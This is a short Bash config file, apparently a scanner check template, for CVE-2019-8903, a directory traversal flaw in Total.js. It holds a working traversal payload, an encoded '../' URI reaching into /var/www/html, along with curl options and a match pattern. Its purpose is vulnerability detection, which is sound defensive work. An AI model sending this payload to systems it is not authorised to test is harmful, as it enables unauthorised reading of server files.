mirror of
https://github.com/DeNNiiInc/UltyScan.git
synced 2026-04-17 18:26:00 +00:00
9 lines
333 B
Bash
9 lines
333 B
Bash
AUTHOR='@xer0dayz'
|
|
VULN_NAME='CVE-2019-8903 - Totaljs - Unathenticated Directory Traversal'
|
|
URI="/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/var/www/html/index.html"
|
|
METHOD='GET'
|
|
MATCH="apache2\.conf"
|
|
SEVERITY='P2 - HIGH'
|
|
CURL_OPTS="--user-agent '' -s -L --insecure"
|
|
SECONDARY_COMMANDS=''
|
|
GREP_OPTIONS='-i' |